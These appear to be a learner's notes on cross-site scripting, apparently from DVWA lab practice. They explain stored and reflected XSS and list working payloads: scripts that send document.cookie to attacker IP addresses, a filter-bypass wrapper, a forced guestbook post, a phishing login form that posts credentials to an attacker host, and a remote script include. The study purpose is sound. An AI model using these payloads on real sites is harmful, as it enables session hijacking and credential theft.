scr<script>
image = new Image();
image.src="<http://192.168.1.1:4444/cookie.gif?c=>"+document.cookie;
</script>ipt
This is when an injected script is stored on the server in a fixed location. The classic example is a forum post, where every user which requests the post from the server will subsequently be affected by the XSS attack. Also referred to as Persistent or Type-I XSS. For this reason, it is usually classified as the most severe since it will typically impact the highest number of users.
This is when an injected script within a request is reflected back in the server’s response. A common example is a search feature which responds by printing (or reflecting) the user’s malicious search input as well as outputting the search information. Given this format, a reflected XSS attack must involve targeting a victim through another method such as social engineering in order to get them to send the request which elicits a reflected response. Also referred to as non-persistent or Type-II XSS.
OWASP Top 10: Real-World Examples (Part 2)
5 Practical Scenarios for XSS Attacks - Pentest-Tools.com Blog
pentest-tools.com-5 Practical Scenarios for XSS Attacks.pdf
<http://localhost:81/DVWA/vulnerabilities/xss_r/?name=>
<script>
new Image().src="<http://192.168.149.128/bogus.php?output=>"+document.cookie;
</script>
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST','<http://localhost:81/DVWA/vulnerabilities/xss_s/>',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
</script>
<http://localhost:81/DVWA/vulnerabilities/xss_r/?name=>
<h3>Please login to proceed</h3>
<form action=http://192.168.149.128>Username:<br><input type="username" name="username">
<br>Password:<br><input type="password" name="password"><br>
<br><input type="submit" value="Logon"></br>
<http://localhost:81/DVWA/vulnerabilities/xss_r/?name=>
<script src="<http://192.168.149.128/xss.js>">